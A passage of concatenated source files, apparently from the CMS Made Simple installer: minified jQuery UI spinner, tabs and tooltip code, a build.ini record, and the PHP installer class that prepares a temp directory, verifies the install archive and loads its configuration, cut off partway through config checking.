e=this.element[0]===this.document[0].activeElement;e||(this.element.focus(),this.previous=s,this._delay(function(){this.previous=s}))}var s;s=this.element[0]===this.document[0].activeElement?this.previous:this.element.val(),t.preventDefault(),i.call(this),this.cancelBlur=!0,this._delay(function(){delete this.cancelBlur,i.call(this)}),this._start(t)!==!1&&this._repeat(null,e(t.currentTarget).hasClass("ui-spinner-up")?1:-1,t)},"mouseup .ui-spinner-button":"_stop","mouseenter .ui-spinner-button":function(t){return e(t.currentTarget).hasClass("ui-state-active")?this._start(t)===!1?!1:(this._repeat(null,e(t.currentTarget).hasClass("ui-spinner-up")?1:-1,t),void 0):void 0},"mouseleave .ui-spinner-button":"_stop"},_draw:function(){var e=this.uiSpinner=this.element.addClass("ui-spinner-input").attr("autocomplete","off").wrap(this._uiSpinnerHtml()).parent().append(this._buttonHtml());this.element.attr("role","spinbutton"),this.buttons=e.find(".ui-spinner-button").attr("tabIndex",-1).button().removeClass("ui-corner-all"),this.buttons.height()>Math.ceil(.5*e.height())&&e.height()>0&&e.height(e.height()),this.options.disabled&&this.disable()},_keydown:function(t){var i=this.options,s=e.ui.keyCode;switch(t.keyCode){case s.UP:return this._repeat(null,1,t),!0;case s.DOWN:return this._repeat(null,-1,t),!0;case s.PAGE_UP:return this._repeat(null,i.page,t),!0;case s.PAGE_DOWN:return this._repeat(null,-i.page,t),!0}return!1},_uiSpinnerHtml:function(){return"<span class='ui-spinner ui-widget ui-widget-content ui-corner-all'></span>"},_buttonHtml:function(){return"<a class='ui-spinner-button ui-spinner-up ui-corner-tr'><span class='ui-icon "+this.options.icons.up+"'>&#9650;</span>"+"</a>"+"<a class='ui-spinner-button ui-spinner-down ui-corner-br'>"+"<span class='ui-icon "+this.options.icons.down+"'>&#9660;</span>"+"</a>"},_start:function(e){return this.spinning||this._trigger("start",e)!==!1?(this.counter||(this.counter=1),this.spinning=!0,!0):!1},_repeat:function(e,t,i){e=e||500,clearTimeout(this.timer),this.timer=this._delay(function(){this._repeat(40,t,i)},e),this._spin(t*this.options.step,i)},_spin:function(e,t){var i=this.value()||0;this.counter||(this.counter=1),i=this._adjustValue(i+e*this._increment(this.counter)),this.spinning&&this._trigger("spin",t,{value:i})===!1||(this._value(i),this.counter++)},_increment:function(t){var i=this.options.incremental;return i?e.isFunction(i)?i(t):Math.floor(t*t*t/5e4-t*t/500+17*t/200+1):1},_precision:function(){var e=this._precisionOf(this.options.step);return null!==this.options.min&&(e=Math.max(e,this._precisionOf(this.options.min))),e},_precisionOf:function(e){var t=""+e,i=t.indexOf(".");return-1===i?0:t.length-i-1},_adjustValue:function(e){var t,i,s=this.options;return t=null!==s.min?s.min:0,i=e-t,i=Math.round(i/s.step)*s.step,e=t+i,e=parseFloat(e.toFixed(this._precision())),null!==s.max&&e>s.max?s.max:null!==s.min&&s.min>e?s.min:e},_stop:function(e){this.spinning&&(clearTimeout(this.timer),clearTimeout(this.mousewheelTimer),this.counter=0,this.spinning=!1,this._trigger("stop",e))},_setOption:function(e,t){if("culture"===e||"numberFormat"===e){var i=this._parse(this.element.val());return this.options[e]=t,this.element.val(this._format(i)),void 0}("max"===e||"min"===e||"step"===e)&&"string"==typeof t&&(t=this._parse(t)),"icons"===e&&(this.buttons.first().find(".ui-icon").removeClass(this.options.icons.up).addClass(t.up),this.buttons.last().find(".ui-icon").removeClass(this.options.icons.down).addClass(t.down)),this._super(e,t),"disabled"===e&&(this.widget().toggleClass("ui-state-disabled",!!t),this.element.prop("disabled",!!t),this.buttons.button(t?"disable":"enable"))},_setOptions:h(function(e){this._super(e)}),_parse:function(e){return"string"==typeof e&&""!==e&&(e=window.Globalize&&this.options.numberFormat?Globalize.parseFloat(e,10,this.options.culture):+e),""===e||isNaN(e)?null:e},_format:function(e){return""===e?"":window.Globalize&&this.options.numberFormat?Globalize.format(e,this.options.numberFormat,this.options.culture):e},_refresh:function(){this.element.attr({"aria-valuemin":this.options.min,"aria-valuemax":this.options.max,"aria-valuenow":this._parse(this.element.val())})},isValid:function(){var e=this.value();return null===e?!1:e===this._adjustValue(e)},_value:function(e,t){var i;""!==e&&(i=this._parse(e),null!==i&&(t||(i=this._adjustValue(i)),e=this._format(i))),this.element.val(e),this._refresh()},_destroy:function(){this.element.removeClass("ui-spinner-input").prop("disabled",!1).removeAttr("autocomplete").removeAttr("role").removeAttr("aria-valuemin").removeAttr("aria-valuemax").removeAttr("aria-valuenow"),this.uiSpinner.replaceWith(this.element)},stepUp:h(function(e){this._stepUp(e)}),_stepUp:function(e){this._start()&&(this._spin((e||1)*this.options.step),this._stop())},stepDown:h(function(e){this._stepDown(e)}),_stepDown:function(e){this._start()&&(this._spin((e||1)*-this.options.step),this._stop())},pageUp:h(function(e){this._stepUp((e||1)*this.options.page)}),pageDown:h(function(e){this._stepDown((e||1)*this.options.page)}),value:function(e){return arguments.length?(h(this._value).call(this,e),void 0):this._parse(this.element.val())},widget:function(){return this.uiSpinner}}),e.widget("ui.tabs",{version:"1.11.2",delay:300,options:{active:null,collapsible:!1,event:"click",heightStyle:"content",hide:null,show:null,activate:null,beforeActivate:null,beforeLoad:null,load:null},_isLocal:function(){var e=/#.*$/;return function(t){var i,s;t=t.cloneNode(!1),i=t.href.replace(e,""),s=location.href.replace(e,"");try{i=decodeURIComponent(i)}catch(n){}try{s=decodeURIComponent(s)}catch(n){}return t.hash.length>1&&i===s}}(),_create:function(){var t=this,i=this.options;this.running=!1,this.element.addClass("ui-tabs ui-widget ui-widget-content ui-corner-all").toggleClass("ui-tabs-collapsible",i.collapsible),this._processTabs(),i.active=this._initialActive(),e.isArray(i.disabled)&&(i.disabled=e.unique(i.disabled.concat(e.map(this.tabs.filter(".ui-state-disabled"),function(e){return t.tabs.index(e)}))).sort()),this.active=this.options.active!==!1&&this.anchors.length?this._findActive(i.active):e(),this._refresh(),this.active.length&&this.load(i.active)},_initialActive:function(){var t=this.options.active,i=this.options.collapsible,s=location.hash.substring(1);return null===t&&(s&&this.tabs.each(function(i,n){return e(n).attr("aria-controls")===s?(t=i,!1):void 0}),null===t&&(t=this.tabs.index(this.tabs.filter(".ui-tabs-active"))),(null===t||-1===t)&&(t=this.tabs.length?0:!1)),t!==!1&&(t=this.tabs.index(this.tabs.eq(t)),-1===t&&(t=i?!1:0)),!i&&t===!1&&this.anchors.length&&(t=0),t},_getCreateEventData:function(){return{tab:this.active,panel:this.active.length?this._getPanelForTab(this.active):e()}},_tabKeydown:function(t){var i=e(this.document[0].activeElement).closest("li"),s=this.tabs.index(i),n=!0;if(!this._handlePageNav(t)){switch(t.keyCode){case e.ui.keyCode.RIGHT:case e.ui.keyCode.DOWN:s++;break;case e.ui.keyCode.UP:case e.ui.keyCode.LEFT:n=!1,s--;break;case e.ui.keyCode.END:s=this.anchors.length-1;break;case e.ui.keyCode.HOME:s=0;break;case e.ui.keyCode.SPACE:return t.preventDefault(),clearTimeout(this.activating),this._activate(s),void 0;case e.ui.keyCode.ENTER:return t.preventDefault(),clearTimeout(this.activating),this._activate(s===this.options.active?!1:s),void 0;default:return}t.preventDefault(),clearTimeout(this.activating),s=this._focusNextTab(s,n),t.ctrlKey||(i.attr("aria-selected","false"),this.tabs.eq(s).attr("aria-selected","true"),this.activating=this._delay(function(){this.option("active",s)},this.delay))}},_panelKeydown:function(t){this._handlePageNav(t)||t.ctrlKey&&t.keyCode===e.ui.keyCode.UP&&(t.preventDefault(),this.active.focus())},_handlePageNav:function(t){return t.altKey&&t.keyCode===e.ui.keyCode.PAGE_UP?(this._activate(this._focusNextTab(this.options.active-1,!1)),!0):t.altKey&&t.keyCode===e.ui.keyCode.PAGE_DOWN?(this._activate(this._focusNextTab(this.options.active+1,!0)),!0):void 0},_findNextTab:function(t,i){function s(){return t>n&&(t=0),0>t&&(t=n),t}for(var n=this.tabs.length-1;-1!==e.inArray(s(),this.options.disabled);)t=i?t+1:t-1;return t},_focusNextTab:function(e,t){return e=this._findNextTab(e,t),this.tabs.eq(e).focus(),e},_setOption:function(e,t){return"active"===e?(this._activate(t),void 0):"disabled"===e?(this._setupDisabled(t),void 0):(this._super(e,t),"collapsible"===e&&(this.element.toggleClass("ui-tabs-collapsible",t),t||this.options.active!==!1||this._activate(0)),"event"===e&&this._setupEvents(t),"heightStyle"===e&&this._setupHeightStyle(t),void 0)},_sanitizeSelector:function(e){return e?e.replace(/[!"$%&'()*+,.\/:;<=>?@\[\]\^`{|}~]/g,"\\$&"):""},refresh:function(){var t=this.options,i=this.tablist.children(":has(a[href])");t.disabled=e.map(i.filter(".ui-state-disabled"),function(e){return i.index(e)}),this._processTabs(),t.active!==!1&&this.anchors.length?this.active.length&&!e.contains(this.tablist[0],this.active[0])?this.tabs.length===t.disabled.length?(t.active=!1,this.active=e()):this._activate(this._findNextTab(Math.max(0,t.active-1),!1)):t.active=this.tabs.index(this.active):(t.active=!1,this.active=e()),this._refresh()},_refresh:function(){this._setupDisabled(this.options.disabled),this._setupEvents(this.options.event),this._setupHeightStyle(this.options.heightStyle),this.tabs.not(this.active).attr({"aria-selected":"false","aria-expanded":"false",tabIndex:-1}),this.panels.not(this._getPanelForTab(this.active)).hide().attr({"aria-hidden":"true"}),this.active.length?(this.active.addClass("ui-tabs-active ui-state-active").attr({"aria-selected":"true","aria-expanded":"true",tabIndex:0}),this._getPanelForTab(this.active).show().attr({"aria-hidden":"false"})):this.tabs.eq(0).attr("tabIndex",0)},_processTabs:function(){var t=this,i=this.tabs,s=this.anchors,n=this.panels;this.tablist=this._getList().addClass("ui-tabs-nav ui-helper-reset ui-helper-clearfix ui-widget-header ui-corner-all").attr("role","tablist").delegate("> li","mousedown"+this.eventNamespace,function(t){e(this).is(".ui-state-disabled")&&t.preventDefault()}).delegate(".ui-tabs-anchor","focus"+this.eventNamespace,function(){e(this).closest("li").is(".ui-state-disabled")&&this.blur()}),this.tabs=this.tablist.find("> li:has(a[href])").addClass("ui-state-default ui-corner-top").attr({role:"tab",tabIndex:-1}),this.anchors=this.tabs.map(function(){return e("a",this)[0]
}).addClass("ui-tabs-anchor").attr({role:"presentation",tabIndex:-1}),this.panels=e(),this.anchors.each(function(i,s){var n,a,o,r=e(s).uniqueId().attr("id"),h=e(s).closest("li"),l=h.attr("aria-controls");t._isLocal(s)?(n=s.hash,o=n.substring(1),a=t.element.find(t._sanitizeSelector(n))):(o=h.attr("aria-controls")||e({}).uniqueId()[0].id,n="#"+o,a=t.element.find(n),a.length||(a=t._createPanel(o),a.insertAfter(t.panels[i-1]||t.tablist)),a.attr("aria-live","polite")),a.length&&(t.panels=t.panels.add(a)),l&&h.data("ui-tabs-aria-controls",l),h.attr({"aria-controls":o,"aria-labelledby":r}),a.attr("aria-labelledby",r)}),this.panels.addClass("ui-tabs-panel ui-widget-content ui-corner-bottom").attr("role","tabpanel"),i&&(this._off(i.not(this.tabs)),this._off(s.not(this.anchors)),this._off(n.not(this.panels)))},_getList:function(){return this.tablist||this.element.find("ol,ul").eq(0)},_createPanel:function(t){return e("<div>").attr("id",t).addClass("ui-tabs-panel ui-widget-content ui-corner-bottom").data("ui-tabs-destroy",!0)},_setupDisabled:function(t){e.isArray(t)&&(t.length?t.length===this.anchors.length&&(t=!0):t=!1);for(var i,s=0;i=this.tabs[s];s++)t===!0||-1!==e.inArray(s,t)?e(i).addClass("ui-state-disabled").attr("aria-disabled","true"):e(i).removeClass("ui-state-disabled").removeAttr("aria-disabled");this.options.disabled=t},_setupEvents:function(t){var i={};t&&e.each(t.split(" "),function(e,t){i[t]="_eventHandler"}),this._off(this.anchors.add(this.tabs).add(this.panels)),this._on(!0,this.anchors,{click:function(e){e.preventDefault()}}),this._on(this.anchors,i),this._on(this.tabs,{keydown:"_tabKeydown"}),this._on(this.panels,{keydown:"_panelKeydown"}),this._focusable(this.tabs),this._hoverable(this.tabs)},_setupHeightStyle:function(t){var i,s=this.element.parent();"fill"===t?(i=s.height(),i-=this.element.outerHeight()-this.element.height(),this.element.siblings(":visible").each(function(){var t=e(this),s=t.css("position");"absolute"!==s&&"fixed"!==s&&(i-=t.outerHeight(!0))}),this.element.children().not(this.panels).each(function(){i-=e(this).outerHeight(!0)}),this.panels.each(function(){e(this).height(Math.max(0,i-e(this).innerHeight()+e(this).height()))}).css("overflow","auto")):"auto"===t&&(i=0,this.panels.each(function(){i=Math.max(i,e(this).height("").height())}).height(i))},_eventHandler:function(t){var i=this.options,s=this.active,n=e(t.currentTarget),a=n.closest("li"),o=a[0]===s[0],r=o&&i.collapsible,h=r?e():this._getPanelForTab(a),l=s.length?this._getPanelForTab(s):e(),u={oldTab:s,oldPanel:l,newTab:r?e():a,newPanel:h};t.preventDefault(),a.hasClass("ui-state-disabled")||a.hasClass("ui-tabs-loading")||this.running||o&&!i.collapsible||this._trigger("beforeActivate",t,u)===!1||(i.active=r?!1:this.tabs.index(a),this.active=o?e():a,this.xhr&&this.xhr.abort(),l.length||h.length||e.error("jQuery UI Tabs: Mismatching fragment identifier."),h.length&&this.load(this.tabs.index(a),t),this._toggle(t,u))},_toggle:function(t,i){function s(){a.running=!1,a._trigger("activate",t,i)}function n(){i.newTab.closest("li").addClass("ui-tabs-active ui-state-active"),o.length&&a.options.show?a._show(o,a.options.show,s):(o.show(),s())}var a=this,o=i.newPanel,r=i.oldPanel;this.running=!0,r.length&&this.options.hide?this._hide(r,this.options.hide,function(){i.oldTab.closest("li").removeClass("ui-tabs-active ui-state-active"),n()}):(i.oldTab.closest("li").removeClass("ui-tabs-active ui-state-active"),r.hide(),n()),r.attr("aria-hidden","true"),i.oldTab.attr({"aria-selected":"false","aria-expanded":"false"}),o.length&&r.length?i.oldTab.attr("tabIndex",-1):o.length&&this.tabs.filter(function(){return 0===e(this).attr("tabIndex")}).attr("tabIndex",-1),o.attr("aria-hidden","false"),i.newTab.attr({"aria-selected":"true","aria-expanded":"true",tabIndex:0})},_activate:function(t){var i,s=this._findActive(t);s[0]!==this.active[0]&&(s.length||(s=this.active),i=s.find(".ui-tabs-anchor")[0],this._eventHandler({target:i,currentTarget:i,preventDefault:e.noop}))},_findActive:function(t){return t===!1?e():this.tabs.eq(t)},_getIndex:function(e){return"string"==typeof e&&(e=this.anchors.index(this.anchors.filter("[href$='"+e+"']"))),e},_destroy:function(){this.xhr&&this.xhr.abort(),this.element.removeClass("ui-tabs ui-widget ui-widget-content ui-corner-all ui-tabs-collapsible"),this.tablist.removeClass("ui-tabs-nav ui-helper-reset ui-helper-clearfix ui-widget-header ui-corner-all").removeAttr("role"),this.anchors.removeClass("ui-tabs-anchor").removeAttr("role").removeAttr("tabIndex").removeUniqueId(),this.tablist.unbind(this.eventNamespace),this.tabs.add(this.panels).each(function(){e.data(this,"ui-tabs-destroy")?e(this).remove():e(this).removeClass("ui-state-default ui-state-active ui-state-disabled ui-corner-top ui-corner-bottom ui-widget-content ui-tabs-active ui-tabs-panel").removeAttr("tabIndex").removeAttr("aria-live").removeAttr("aria-busy").removeAttr("aria-selected").removeAttr("aria-labelledby").removeAttr("aria-hidden").removeAttr("aria-expanded").removeAttr("role")}),this.tabs.each(function(){var t=e(this),i=t.data("ui-tabs-aria-controls");i?t.attr("aria-controls",i).removeData("ui-tabs-aria-controls"):t.removeAttr("aria-controls")}),this.panels.show(),"content"!==this.options.heightStyle&&this.panels.css("height","")},enable:function(t){var i=this.options.disabled;i!==!1&&(void 0===t?i=!1:(t=this._getIndex(t),i=e.isArray(i)?e.map(i,function(e){return e!==t?e:null}):e.map(this.tabs,function(e,i){return i!==t?i:null})),this._setupDisabled(i))},disable:function(t){var i=this.options.disabled;if(i!==!0){if(void 0===t)i=!0;else{if(t=this._getIndex(t),-1!==e.inArray(t,i))return;i=e.isArray(i)?e.merge([t],i).sort():[t]}this._setupDisabled(i)}},load:function(t,i){t=this._getIndex(t);var s=this,n=this.tabs.eq(t),a=n.find(".ui-tabs-anchor"),o=this._getPanelForTab(n),r={tab:n,panel:o};this._isLocal(a[0])||(this.xhr=e.ajax(this._ajaxSettings(a,i,r)),this.xhr&&"canceled"!==this.xhr.statusText&&(n.addClass("ui-tabs-loading"),o.attr("aria-busy","true"),this.xhr.success(function(e){setTimeout(function(){o.html(e),s._trigger("load",i,r)},1)}).complete(function(e,t){setTimeout(function(){"abort"===t&&s.panels.stop(!1,!0),n.removeClass("ui-tabs-loading"),o.removeAttr("aria-busy"),e===s.xhr&&delete s.xhr},1)})))},_ajaxSettings:function(t,i,s){var n=this;return{url:t.attr("href"),beforeSend:function(t,a){return n._trigger("beforeLoad",i,e.extend({jqXHR:t,ajaxSettings:a},s))}}},_getPanelForTab:function(t){var i=e(t).attr("aria-controls");return this.element.find(this._sanitizeSelector("#"+i))}}),e.widget("ui.tooltip",{version:"1.11.2",options:{content:function(){var t=e(this).attr("title")||"";return e("<a>").text(t).html()},hide:!0,items:"[title]:not([disabled])",position:{my:"left top+15",at:"left bottom",collision:"flipfit flip"},show:!0,tooltipClass:null,track:!1,close:null,open:null},_addDescribedBy:function(t,i){var s=(t.attr("aria-describedby")||"").split(/\s+/);s.push(i),t.data("ui-tooltip-id",i).attr("aria-describedby",e.trim(s.join(" ")))},_removeDescribedBy:function(t){var i=t.data("ui-tooltip-id"),s=(t.attr("aria-describedby")||"").split(/\s+/),n=e.inArray(i,s);-1!==n&&s.splice(n,1),t.removeData("ui-tooltip-id"),s=e.trim(s.join(" ")),s?t.attr("aria-describedby",s):t.removeAttr("aria-describedby")},_create:function(){this._on({mouseover:"open",focusin:"open"}),this.tooltips={},this.parents={},this.options.disabled&&this._disable(),this.liveRegion=e("<div>").attr({role:"log","aria-live":"assertive","aria-relevant":"additions"}).addClass("ui-helper-hidden-accessible").appendTo(this.document[0].body)},_setOption:function(t,i){var s=this;return"disabled"===t?(this[i?"_disable":"_enable"](),this.options[t]=i,void 0):(this._super(t,i),"content"===t&&e.each(this.tooltips,function(e,t){s._updateContent(t.element)}),void 0)},_disable:function(){var t=this;e.each(this.tooltips,function(i,s){var n=e.Event("blur");n.target=n.currentTarget=s.element[0],t.close(n,!0)}),this.element.find(this.options.items).addBack().each(function(){var t=e(this);t.is("[title]")&&t.data("ui-tooltip-title",t.attr("title")).removeAttr("title")})},_enable:function(){this.element.find(this.options.items).addBack().each(function(){var t=e(this);t.data("ui-tooltip-title")&&t.attr("title",t.data("ui-tooltip-title"))})},open:function(t){var i=this,s=e(t?t.target:this.element).closest(this.options.items);s.length&&!s.data("ui-tooltip-id")&&(s.attr("title")&&s.data("ui-tooltip-title",s.attr("title")),s.data("ui-tooltip-open",!0),t&&"mouseover"===t.type&&s.parents().each(function(){var t,s=e(this);s.data("ui-tooltip-open")&&(t=e.Event("blur"),t.target=t.currentTarget=this,i.close(t,!0)),s.attr("title")&&(s.uniqueId(),i.parents[this.id]={element:this,title:s.attr("title")},s.attr("title",""))}),this._updateContent(s,t))},_updateContent:function(e,t){var i,s=this.options.content,n=this,a=t?t.type:null;return"string"==typeof s?this._open(t,e,s):(i=s.call(e[0],function(i){e.data("ui-tooltip-open")&&n._delay(function(){t&&(t.type=a),this._open(t,e,i)})}),i&&this._open(t,e,i),void 0)},_open:function(t,i,s){function n(e){u.of=e,o.is(":hidden")||o.position(u)}var a,o,r,h,l,u=e.extend({},this.options.position);if(s){if(a=this._find(i))return a.tooltip.find(".ui-tooltip-content").html(s),void 0;i.is("[title]")&&(t&&"mouseover"===t.type?i.attr("title",""):i.removeAttr("title")),a=this._tooltip(i),o=a.tooltip,this._addDescribedBy(i,o.attr("id")),o.find(".ui-tooltip-content").html(s),this.liveRegion.children().hide(),s.clone?(l=s.clone(),l.removeAttr("id").find("[id]").removeAttr("id")):l=s,e("<div>").html(l).appendTo(this.liveRegion),this.options.track&&t&&/^mouse/.test(t.type)?(this._on(this.document,{mousemove:n}),n(t)):o.position(e.extend({of:i},this.options.position)),o.hide(),this._show(o,this.options.show),this.options.show&&this.options.show.delay&&(h=this.delayedShow=setInterval(function(){o.is(":visible")&&(n(u.of),clearInterval(h))},e.fx.interval)),this._trigger("open",t,{tooltip:o}),r={keyup:function(t){if(t.keyCode===e.ui.keyCode.ESCAPE){var s=e.Event(t);s.currentTarget=i[0],this.close(s,!0)}}},i[0]!==this.element[0]&&(r.remove=function(){this._removeTooltip(o)}),t&&"mouseover"!==t.type||(r.mouseleave="close"),t&&"focusin"!==t.type||(r.focusout="close"),this._on(!0,i,r)}},close:function(t){var i,s=this,n=e(t?t.currentTarget:this.element),a=this._find(n);a&&(i=a.tooltip,a.closing||(clearInterval(this.delayedShow),n.data("ui-tooltip-title")&&!n.attr("title")&&n.attr("title",n.data("ui-tooltip-title")),this._removeDescribedBy(n),a.hiding=!0,i.stop(!0),this._hide(i,this.options.hide,function(){s._removeTooltip(e(this))}),n.removeData("ui-tooltip-open"),this._off(n,"mouseleave focusout keyup"),n[0]!==this.element[0]&&this._off(n,"remove"),this._off(this.document,"mousemove"),t&&"mouseleave"===t.type&&e.each(this.parents,function(t,i){e(i.element).attr("title",i.title),delete s.parents[t]}),a.closing=!0,this._trigger("close",t,{tooltip:i}),a.hiding||(a.closing=!1)))},_tooltip:function(t){var i=e("<div>").attr("role","tooltip").addClass("ui-tooltip ui-widget ui-corner-all ui-widget-content "+(this.options.tooltipClass||"")),s=i.uniqueId().attr("id");return e("<div>").addClass("ui-tooltip-content").appendTo(i),i.appendTo(this.document[0].body),this.tooltips[s]={element:t,tooltip:i}},_find:function(e){var t=e.data("ui-tooltip-id");return t?this.tooltips[t]:null},_removeTooltip:function(e){e.remove(),delete this.tooltips[e.attr("id")]},_destroy:function(){var t=this;e.each(this.tooltips,function(i,s){var n=e.Event("blur"),a=s.element;n.target=n.currentTarget=a[0],t.close(n,!0),e("#"+i).remove(),a.data("ui-tooltip-title")&&(a.attr("title")||a.attr("title",a.data("ui-tooltip-title")),a.removeData("ui-tooltip-title"))}),this.liveRegion.remove()}})});[build]
build_number = 2.2.22.003233.1755007004
build_time = 1755007016
build_user = SYSTEM
build_host = DESKTOP-NVBGLM7
<?php

namespace cms_autoinstaller;
use \__appbase\utils;

include_once(__DIR__.'/lib/compat.functions.php');
include_once(\dirname(__FILE__, 2) . '/lib/classes/base/class.app.php');

class cms_install extends \__appbase\app
{
    private static $_instance;
    private $_archive;
    private $_dest_version;
    private $_dest_name;
    private $_dest_schema;
    private $_destdir;
    private $_custom_destdir;
    private $_nls;
    private $_orig_tz;
    private $_orig_error_level;
    private $_custom_tmpdir;

    public static function get_tmpdir()
    {
        // because phar uses tmpfile() we need to set the TMPDIR environment variable
        // with whatever directory we find.
        $config = self::get_instance()->get_config();
        return $config['tmpdir'];
    }

    private function fixup_tmpdir_environment()
    {
        // if the system temporary directory is not the same as the config temporary directory
        // then we attempt to putenv the TMPDIR environment variable
        // so that tmpfile() will work as it uses the system temporary directory which can read from environment variables
        $sys_tmpdir = null;
        if( \function_exists('sys_get_temp_dir') ) $sys_tmpdir = \rtrim(\sys_get_temp_dir(), '\\/');
        $config = $this->get_config();
        if((!$sys_tmpdir || !\is_dir($sys_tmpdir) || !\is_writable($sys_tmpdir)) && $sys_tmpdir != $config['tmpdir'] ) {
            @\putenv('TMPDIR=' . $config['tmpdir']);
            $try1 = \getenv('TMPDIR');
            if( $try1 != $config['tmpdir'] ) throw new \RuntimeException('Sorry, putenv does not work on this system, and your system temporary directory is not set properly.');
        }
    }
  
  /**
   * @throws \Exception
   */
  public function __construct()
    {
        parent::__construct(__FILE__);

        // initialize the session.
        $sess = \__appbase\session::get();
        $junk = $sess[__CLASS__]; // this is junk, but triggers session to start.

        // get the request
        $request = \__appbase\request::get();
        if( isset($request['clear']) ) {
            $sess->reset();
        }

        $config = $this->get_config();

        // setup autoload
        \spl_autoload_register(__NAMESPACE__ . '\cms_install::autoload');

        $this->fixup_tmpdir_environment();

        // setup smarty
        $smarty = \__appbase\smarty();
        $smarty->assign('APPNAME','cms_installer');
        $smarty->assign('config',$config);
        $smarty->assign('installer_version',$config['installer_version']);

        $fn = self::get_appdir() . '/build.ini';
        $build = null;
        if( \file_exists($fn) ) $build = \parse_ini_file($fn);
        if( isset($build['build_time']) ) $smarty->assign('build_time',$build['build_time']);
        if( isset($build['build_number']) ) $smarty->assign('build_number',$build['build_number']);

        // handle debug mode
        if( $config['debug'] ) {
            @\ini_set('display_errors', 1);
            @\error_reporting(\E_ALL);
            @\ini_set('error_log', \Phar::running(FALSE) . '/error.log');
        }

        if( $this->in_phar() && !$config['nobase'] ) {
            $base_href = $_SERVER['SCRIPT_NAME'];
            if( \__appbase\endswith($base_href,'.php') ) {
                $base_href = $base_href . '/';
                $smarty->assign('BASE_HREF',$base_href);
            }
        }

        // find our archive, copy it... and rename it securely.
        // we do this because phar data cannot read from a .tar.gz file that is already embedded within a phar
        // (some environments)
        $tmpdir = $this->get_tmpdir().'/m' . \md5(__FILE__ . \session_id());
        $src_archive = $config['archive'] ?? 'data/data.tar.gz';
        $src_archive = \dirname(__DIR__) . \DIRECTORY_SEPARATOR . $src_archive;
        if( !\file_exists($src_archive) ) throw new \RuntimeException('Could not find installation archive at ' . $src_archive);
        $dest_archive = $tmpdir . \DIRECTORY_SEPARATOR . "f" . \md5($src_archive . \session_id()) . '.tgz';
        $src_md5 = \md5_file($src_archive);

        for( $i = 0; $i < 2; $i++ ) {
            if( !\file_exists($dest_archive) ) {
              if(!@\mkdir($tmpdir, 0777, TRUE) && !\is_dir($tmpdir))
              {
                throw new \RuntimeException(\sprintf('Directory "%s" was not created', $tmpdir));
              }
                @\copy($src_archive, $dest_archive);
            }
            $dest_md5 = \md5_file($dest_archive);
            if( $src_md5 == $dest_md5 && \is_readable($dest_archive) ) { break; }
            @\unlink($dest_archive);
        }
        if(2 == $i) throw new \RuntimeException('Checksum of temporary archive does not match... copying/permissions problem');
        $this->_archive = $dest_archive;;

        // get version details (version we are installing)
        // if not in the session, save them there.
        if( isset($sess[__CLASS__.'version']) ) {
            $ver = $sess[__CLASS__.'version'];
            $this->_dest_version = $ver['version'];
            $this->_dest_name = $ver['version_name'];
            $this->_dest_schema = $ver['schema_version'];
        }
        else {
            $verfile = \dirname($src_archive) . '/version.php';
            if( !\is_file($verfile) ) throw new \RuntimeException('Could not find version file');
          
          /**
           * from version.php
           * @var array $CMS_VERSION
           * @var string $CMS_VERSION_NAME ,
           * @var string $CMS_SCHEMA_VERSION
           */
            include_once($verfile);
            $ver = ['version' => $CMS_VERSION, 'version_name' => $CMS_VERSION_NAME, 'schema_version' => $CMS_SCHEMA_VERSION];
            $sess[__CLASS__.'version'] = $ver;
            $this->_dest_version = $CMS_VERSION;
            $this->_dest_name = $CMS_VERSION_NAME;
            $this->_dest_schema = $CMS_SCHEMA_VERSION;
        }
    }

    static public function autoload($classname)
    {
        if( \__appbase\startswith($classname, 'cms_autoinstaller\\') ) $classname = \substr($classname, \strlen('cms_autoinstaller\\'));

        $dirs = [__DIR__, __DIR__ . '/base', __DIR__ . '/lib', __DIR__ . '/wizard'];
        foreach( $dirs as $dir ) {
            $fn = $dir."/class.$classname.php";
            if( \file_exists($fn) ) {
                include_once($fn);
                return;
            }
        }
    }

    protected function set_config_defaults()
    {
        $tmp = [ 'timezone' => null, 'tmpdir' => null, 'dest' => null, 'debug' => false, 'nofiles' => false, 'nobase' => false, 'lang' => null, 'verbose' => false ];
        $config = \array_merge(parent::get_config(), $tmp);
        $this->_orig_tz = $config['timezone'] = @\date_default_timezone_get();
        if( !$this->_orig_tz ) $this->_orig_tz = $config['timezone'] = 'UTC';
        $config['dest'] = \realpath(\getcwd());
        return $config;
    }

    protected function load_config()
    {
        // setup some defaults
        $config = $this->set_config_defaults();

        // override default config with config file
        $config_file = \realpath(\getcwd()) . '/custom_config.ini';
        if(\is_file($config_file) && \is_readable($config_file) ) {
            $tmp = \parse_ini_file($config_file);
            if(\is_array($tmp) && \count($tmp) ) {
                $config = \array_merge($config, $tmp);
                if( isset($tmp['dest']) ) $this->_custom_destdir = $tmp['dest'];
            }
        }

        // override current config with url params
        $request = \__appbase\request::get();
        $list = [ 'TMPDIR', 'tmpdir', 'timezone', 'tz', 'dest', 'destdir', 'debug', 'nofiles', 'no_files', 'nobase' ];
        foreach( $list as $key ) {
	    if( !isset($request[$key]) ) continue;
            $val = $request[$key];
            switch( $key ) {
            case 'TMPDIR':
            case 'tmpdir':
                $config['tmpdir'] = \trim($val);
                break;
            case 'timezone':
            case 'tz':
                $config['timezone'] = \trim($val);
                break;
            case 'dest':
            case 'destdir':
              $this->_custom_destdir = $config['dest'] = \trim($val);
                break;
            case 'debug':
                $config['debug'] = utils::to_bool($val);
                break;
            case 'nobase':
                $config['nobase'] = utils::to_bool($val);
                break;
            case 'nofiles':
            case 'no_files':
                $config['nofiles'] = utils::to_bool($val);
                break;
            }
        }
        return $config;
    }

    protected function check_config($config)
    {
        foreach( $config as $key => $val ) {
            switch( $key ) {
            case 'tmpdir':
                if( !$val ) {
                    // no tmpdir set... gotta find or create one.
                    $val = parent::get_tmpdir();
                }
                if(!\is_dir($val) || !\is_writable($val) ) {
                    // could not find a valid system temporary directory, or none specified. gotta make one
                    $dir = \realpath(\getcwd()) . '/__m' . \md5(\session_id());
                    if(!@\is_dir($dir) && !\mkdir($dir) && !\is_dir($dir)) throw new \RuntimeException('Sorry, problem determining a temporary directory, non specified, and we could not create one.');
                    $txt = 'This is temporary directory created for installing CMSMS in punitively restrictive environments.  You may delete this directory and its files once installation is complete.';
                    if( !@file_put_contents($dir.'/__cmsms',$txt) ) throw new \RuntimeException('We could not create a file in the temporary directory we just created (is safe mode on?).');
                    $config[$key] = $dir;
                    $this->_custom_tmpdir = $dir;
                    $val = $dir;
                }
                $config[$key] = $val;
                break;
            case 'dest':
                if(!\is_dir($val) || !\is_writable($val) ) {
